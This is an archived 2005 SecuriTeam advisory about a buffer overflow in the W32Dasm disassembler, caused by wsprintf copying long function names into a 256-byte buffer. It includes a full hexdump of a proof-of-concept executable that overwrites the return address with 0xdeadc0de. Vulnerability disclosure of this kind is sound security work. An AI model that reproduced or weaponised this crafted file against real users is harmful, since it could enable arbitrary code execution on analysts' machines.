Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] W32Dasm Local Buffer Overflow

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] W32Dasm Local Buffer Overflow
Date: 25 Jan 2005 18:48:47 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  W32Dasm Local Buffer Overflow
------------------------------------------------------------------------


SUMMARY

 <http://www.expage.com/page/w32dasm> W32Dasm is "a cool and famous 
disassembler/debugger developed by URSoft. It has tons of functions and, 
also if it is no longer supported by long time, it is still widely used by 
a lot of people".

The program uses the wsprintf() function to copy the name of the 
imported/exported functions of the analyzed file into a buffer of only 256 
bytes, this allows an attacker to overflow the buffer and cause the 
program to execute arbitrary code.

DETAILS

Vulnerable Systems:
 * W32Dasm version 8.93 and prior

Exploit:
Exploiting the bug is very simple, all you need is to get an executable 
and searching for the name of an imported or exported function to modify.

Luigi has written a very simple proof-of-concept that overwrites the 
return address with 0xdeadc0de ( 
<http://aluigi.altervista.org/poc/w32dasmbof.disasm_me> 
http://aluigi.altervista.org/poc/w32dasmbof.disasm_me):
$ hexdump w32dasmbof.disasm_me
0000000 5a4d 0090 0003 0000 0004 0000 ffff 0000
0000010 00b8 0000 0000 0000 0040 0000 0000 0000
0000020 0000 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 0080 0000
0000040 1f0e 0eba b400 cd09 b821 4c01 21cd 6854
0000050 7369 7020 6f72 7267 6d61 6320 6e61 6f6e
0000060 2074 6562 7220 6e75 6920 206e 4f44 2053
0000070 6f6d 6564 0d2e 0a0d 0024 0000 0000 0000
0000080 4550 0000 014c 0003 4a5d 41f5 0000 0000
0000090 0000 0000 00e0 030f 010b 3802 0600 0000
00000a0 0400 0000 0000 0000 1219 0000 1000 0000
00000b0 2000 0000 0000 0040 1000 0000 0200 0000
00000c0 0001 0000 0000 0000 0004 0000 0000 0000
00000d0 4000 0000 0200 0000 ce24 0000 0003 0000
00000e0 0000 0010 1000 0000 0000 0010 1000 0000
00000f0 0000 0000 0010 0000 0000 0000 0000 0000
0000100 3000 0000 013c 0000 0000 0000 0000 0000
0000110 0000 0000 0000 0000 0000 0000 0000 0000
*
0000170 0000 0000 0000 0000 742e 7865 0074 0000
0000180 02dc 0000 1000 0000 0400 0000 0200 0000
0000190 0000 0000 0000 0000 0000 0000 0020 6000
00001a0 642e 7461 0061 0000 0094 0000 2000 0000
00001b0 0200 0000 0600 0000 0000 0000 0000 0000
00001c0 0000 0000 0040 c000 692e 6164 6174 0000
00001d0 013c 0000 3000 0000 0200 0000 0800 0000
00001e0 0000 0000 0000 0000 0000 0000 0060 e000
00001f0 0000 0000 0000 0000 0000 0000 0000 0000
0000200 c031 8b40 244c f704 0441 0006 0000 0f74
0000210 448b 0824 548b 1024 0289 03b8 0000 c300
0000220 5653 8b57 2444 5010 fe6a 0068 4010 6400
0000230 35ff 0000 0000 8964 0025 0000 8b00 2444
0000240 8b20 0858 708b 830c fffe 2074 743b 2424
0000250 1a74 348d 8b76 b30c 4c8b 0824 488b 830c
0000260 b37c 0004 d775 54ff 08b3 d1eb 8f64 0005
0000270 0000 8300 0cc4 5e5f c35b 8955 53e5 5756
0000280 6a55 6a00 6800 1092 0040 75ff e808 020e
0000290 0000 5f5d 5b5e ec89 c35d 55fc e589 ec83
00002a0 5308 5756 8b55 0c5d 458b a308 208c 0040
00002b0 1d89 2090 0040 40f7 0604 0000 0f00 bc85
00002c0 0000 8900 f845 458b 8910 fc45 90a3 4020
00002d0 8d00 f845 4389 8bfc 0c73 7b8b 8308 fffe
00002e0 840f 00a8 0000 0c8d 8376 8f7c 0004 7d74
00002f0 5556 6b8d 8b10 ec45 008b 008b 30a3 4020
0000300 8b00 ec55 028b 34a3 4020 8b00 0442 38a3
0000310 4020 5600 5157 14b9 0000 8d00 3c3d 4020
0000320 8b00 3435 4020 f300 8da5 3c3d 4020 8900
0000330 343d 4020 5900 5e5f 54ff 048f 5e5d 5d8b
0000340 090c 74c0 7828 8b34 087b e853 ff2a ffff
0000350 c483 8d04 106b 5356 c3e8 fffe 83ff 08c4
0000360 0c8d 8b76 8f04 438b ff0c 8f54 8b08 087b
0000370 0c8d 8b76 8f34 62e9 ffff 31ff ebc0 5571
0000380 6b8d 6a10 53ff 95e8 fffe 83ff 0cc4 006a
0000390 05c7 2010 0040 000b 0000 0b6a 2fe8 0001
00003a0 8300 08c4 c009 2175 006a 05c7 2010 0040
00003b0 0008 0000 086a 15e8 0001 8300 08c4 c009
00003c0 0775 01b8 0000 eb00 8327 fff8 2a74 ff50
00003d0 1035 4020 e800 00f6 0000 c483 ff08 1035
00003e0 4020 e800 00dc 0000 c483 b804 0001 0000
00003f0 5f5d 5b5e ec89 c35d 3d83 202c 0040 7500
0000400 b807 0001 0000 e8eb 2ca1 4020 6a00 ff0b
0000410 58e0 01b8 0000 eb00 64d7 00a1 0000 5500
0000420 e589 ff6a 1c68 4020 6800 109a 0040 6450
0000430 2589 0000 0000 ec83 5310 5756 6589 50e8
0000440 3cd9 6624 0c81 0024 d903 242c c483 6a04
0000450 6a00 6800 2028 0040 2468 4020 6800 2020
0000460 0040 45e8 0000 ff00 2835 4020 ff00 2435
0000470 4020 ff00 2035 4020 8900 1425 4020 e800
0000480 0018 0000 c483 3118 89c9 fc4d e850 0026
0000490 0000 c3c9 a364 0000 0000 00c3 c031 90c3
00004a0 25ff 30b4 0040 9090 0000 0000 25ff 30c0
00004b0 0040 9090 0000 0000 25ff 30c4 0040 9090
00004c0 0000 0000 25ff 30c8 0040 9090 0000 0000
00004d0 25ff 30cc 0040 9090 0000 0000 0000 0000
00004e0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000600 2000 0040 2000 0040 8000 0000 0000 0000
0000610 0000 0000 0000 0000 0000 0000 0000 0000
*
0000800 3090 0000 0000 0000 0000 0000 310c 0000
0000810 30b4 0000 309c 0000 0000 0000 0000 0000
0000820 3120 0000 30c0 0000 0000 0000 0000 0000
0000830 0000 0000 0000 0000 0000 0000 0000 0000
*
0000890 30d4 0000 0000 0000 0000 0000 30e0 0000
00008a0 30f0 0000 30f8 0000 3100 0000 0000 0000
00008b0 0000 0000 30d4 0000 0000 0000 0000 0000
00008c0 30e0 0000 30f0 0000 30f8 0000 3100 0000
00008d0 0000 0000 0278 6161 6161 6161 6161 6161
00008e0 6161 6161 6161 6161 6161 6161 6161 6161
*
00009d0 6161 6161 6161 c0de dead 0000 0000 0000
00009e0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000a00


ADDITIONAL INFORMATION

The information has been provided by  <mailto:aluigi@autistici.org> Luigi 
Auriemma.
The original article can be found at:  
<http://aluigi.altervista.org/adv/w32dasmbof-adv.txt> 
http://aluigi.altervista.org/adv/w32dasmbof-adv.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] W32Dasm Local Buffer Overflow, SecuriTeam <=
Previous by Date:  [UNIX] Multiple Vulnerabilities in MercuryBoard, SecuriTeam
Next by Date:  [NT] Multiple Buffer Overflows in Golden FTP Server, SecuriTeam
Previous by Thread:  [UNIX] Multiple Vulnerabilities in MercuryBoard, SecuriTeam
Next by Thread:  [NT] Multiple Buffer Overflows in Golden FTP Server, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]